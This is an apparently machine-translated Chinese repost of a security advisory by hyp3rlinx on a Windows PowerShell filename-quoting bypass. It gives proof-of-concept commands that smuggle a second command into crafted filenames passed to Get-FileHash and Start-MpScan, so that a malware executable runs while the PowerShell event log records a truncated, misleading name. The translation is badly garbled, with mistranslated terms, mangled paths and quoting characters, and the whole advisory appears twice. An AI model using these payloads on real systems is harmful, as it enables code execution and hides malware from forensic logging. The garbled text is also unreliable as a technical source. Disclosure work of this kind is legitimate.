[+] Credits: John Page(又名Hyp3rlinx)
[+]网站: hyp3rlinx.altervista.org
[+]源: http://hyp3rlinx.altervista.org/adv...code_code_code_exec_exec_event_log_bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Microsoft Windows PowerShell
建立在。网络框架,Windows PowerShell帮助IT专业人员和电力用户控制和自动化Windows操作系统的管理以及在Windows上运行的应用程序。
[漏洞类型]
PowerShell单引号执行/事件日志旁路
[CVE参考]
N/A。
[安全问题]
在过去的时间里,我透露了PowerShell在处理专门制作的文件名时如何执行意外文件或Base64代码。
这项研究基于我的“ pstrojanfile”工作,添加了PS命令行单引号旁路和PS事件记录失败。
在Windows CL选项卡上,完成文件名使用可以利用的双引号来触发任意代码执行。
但是,如果文件名被单个引号包裹,那才失败,那就是到目前为止。
[单引号代码执行]
将两个分号';'结合在一起和andpers和''角色,我发现它绕过了一个恶意文件名的单一报价限制。
尾随的半隆';'划界.xml扩展名,并有助于触发case.exe中指定的PE文件,而PS事件日志被截断了。
使用Defender API进行以下三个测试用例,该测试案例以特殊精心制作的文件名。
C: \ PowerShell Set -Procesmitation -policyFilePath'test; SAPS DOOM;xml'
1)双引号还可以
'测试; saps doom;xml'
2)单引号失败
'测试; saps doom;xml'
3)单语引号绕过
'testdoom;xml'
PowerShell API调用前缀为“ PowerShell” CMD是一项要求,可能会影响许多内置的PS API或模块命令。
C: \ User \ gg \ downloads \ powerShell start -mpscan -scanpath'c: \ users \ users \ gg \ downloads \ infectedmalware;zip'
Malware.exe居住在下载dir中,请注意,我们只需要一个部分名称作为.zip存档文件名的一部分,我们在这里扫描
并且它还排除了该文件名中的.EXE部分。
[PS事件日志旁路]
在Windows PowerShell上,可以启用记录记录,以提醒SOC可疑活动或事件响应响应法医文物的目的。
但是,当绕过PS单引号时,我注意到有趣的副作用。 ampersand的角色似乎可以截断PS事件日志。
例如,处理“ Invedmalware”; zip“事件ID 403日志“感染”,而不是实际执行的“ malware.exe”的真实名称。
是否想从PowerShell事件记录中掩盖文件的真实名称? (Malware.exe生活在同一目录中)
C: \ PowerShell Get -Filehash'StectedMalware;zip'-algorithm MD5
在事件日志上方的hostapplication下方包含“感染”,而不是由于截断而实际执行的恶意软件的真实名称。
[PS LOG ID 403摘要]
发动机状态从可用的停止更改为。
详细信息:
newenginestate=停止
先前的enginestate=可用
Sequencenumber=25
主机名=ConsoleHost
传票=5.1.19041.1682
HOSTID=FECDC355-0E89-4D4C-A31D-7835CAFA44F0
hostapplication=powershell get-filehash被感染
EngineVersion=5.1.19041.1682
[漏洞/POC]
powershell get -filehash'感染;zip'-algorithm md5
运行一些恶意软件加上旁路记录的真实文件名称:
C: \ USER \ gg \ downloadspowershell get -filehash'InvedectedMalware;zip'-algorithm MD5
pe文件恶意软件。exe在下载目录中,请注意.zip我们扫描不包括.exe在文件名中。
防御者反恶意软件API:
powerShell start -mpscan -scanpath'C: \ users \ gg \ downloads \ infectedmalware;zip'
使用Double':调用Ping CMD
C: \ PowerShell Get -Filehash'PowerFail 8.8.8.8.txt'-algorithm MD5
致电Windows CMD记录受害者:
C: \ powerShell start -mpscan -scanpath'VirusLogofFtest.Zip'
我们有选项:
a)调用命令使用double'' - 'viruslogofftest.zip'
b)旁路PS事件记录的真实文件名和执行代码使用“ with”;' - '感染软件;zip'
[参考]
[网络访问]
当地的
[严重性]
高的
[披露时间表]
供应商Notification:大约2019年
2023年12月27日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
[+]网站: hyp3rlinx.altervista.org
[+]源: http://hyp3rlinx.altervista.org/adv...code_code_code_exec_exec_event_log_bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.microsoft.com
[产品]
Microsoft Windows PowerShell
建立在。网络框架,Windows PowerShell帮助IT专业人员和电力用户控制和自动化Windows操作系统的管理以及在Windows上运行的应用程序。
[漏洞类型]
PowerShell单引号执行/事件日志旁路
[CVE参考]
N/A。
[安全问题]
在过去的时间里,我透露了PowerShell在处理专门制作的文件名时如何执行意外文件或Base64代码。
这项研究基于我的“ pstrojanfile”工作,添加了PS命令行单引号旁路和PS事件记录失败。
在Windows CL选项卡上,完成文件名使用可以利用的双引号来触发任意代码执行。
但是,如果文件名被单个引号包裹,那才失败,那就是到目前为止。
[单引号代码执行]
将两个分号';'结合在一起和andpers和''角色,我发现它绕过了一个恶意文件名的单一报价限制。
尾随的半隆';'划界.xml扩展名,并有助于触发case.exe中指定的PE文件,而PS事件日志被截断了。
使用Defender API进行以下三个测试用例,该测试案例以特殊精心制作的文件名。
C: \ PowerShell Set -Procesmitation -policyFilePath'test; SAPS DOOM;xml'
1)双引号还可以
'测试; saps doom;xml'
2)单引号失败
'测试; saps doom;xml'
3)单语引号绕过
'testdoom;xml'
PowerShell API调用前缀为“ PowerShell” CMD是一项要求,可能会影响许多内置的PS API或模块命令。
C: \ User \ gg \ downloads \ powerShell start -mpscan -scanpath'c: \ users \ users \ gg \ downloads \ infectedmalware;zip'
Malware.exe居住在下载dir中,请注意,我们只需要一个部分名称作为.zip存档文件名的一部分,我们在这里扫描
并且它还排除了该文件名中的.EXE部分。
[PS事件日志旁路]
在Windows PowerShell上,可以启用记录记录,以提醒SOC可疑活动或事件响应响应法医文物的目的。
但是,当绕过PS单引号时,我注意到有趣的副作用。 ampersand的角色似乎可以截断PS事件日志。
例如,处理“ Invedmalware”; zip“事件ID 403日志“感染”,而不是实际执行的“ malware.exe”的真实名称。
是否想从PowerShell事件记录中掩盖文件的真实名称? (Malware.exe生活在同一目录中)
C: \ PowerShell Get -Filehash'StectedMalware;zip'-algorithm MD5
在事件日志上方的hostapplication下方包含“感染”,而不是由于截断而实际执行的恶意软件的真实名称。
[PS LOG ID 403摘要]
发动机状态从可用的停止更改为。
详细信息:
newenginestate=停止
先前的enginestate=可用
Sequencenumber=25
主机名=ConsoleHost
传票=5.1.19041.1682
HOSTID=FECDC355-0E89-4D4C-A31D-7835CAFA44F0
hostapplication=powershell get-filehash被感染
EngineVersion=5.1.19041.1682
[漏洞/POC]
powershell get -filehash'感染;zip'-algorithm md5
运行一些恶意软件加上旁路记录的真实文件名称:
C: \ USER \ gg \ downloadspowershell get -filehash'InvedectedMalware;zip'-algorithm MD5
pe文件恶意软件。exe在下载目录中,请注意.zip我们扫描不包括.exe在文件名中。
防御者反恶意软件API:
powerShell start -mpscan -scanpath'C: \ users \ gg \ downloads \ infectedmalware;zip'
使用Double':调用Ping CMD
C: \ PowerShell Get -Filehash'PowerFail 8.8.8.8.txt'-algorithm MD5
致电Windows CMD记录受害者:
C: \ powerShell start -mpscan -scanpath'VirusLogofFtest.Zip'
我们有选项:
a)调用命令使用double'' - 'viruslogofftest.zip'
b)旁路PS事件记录的真实文件名和执行代码使用“ with”;' - '感染软件;zip'
[参考]
正在加载...
github.com
正在加载...
hyp3rlinx.altervista.org
正在加载...
hyp3rlinx.altervista.org
当地的
[严重性]
高的
[披露时间表]
供应商Notification:大约2019年
2023年12月27日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
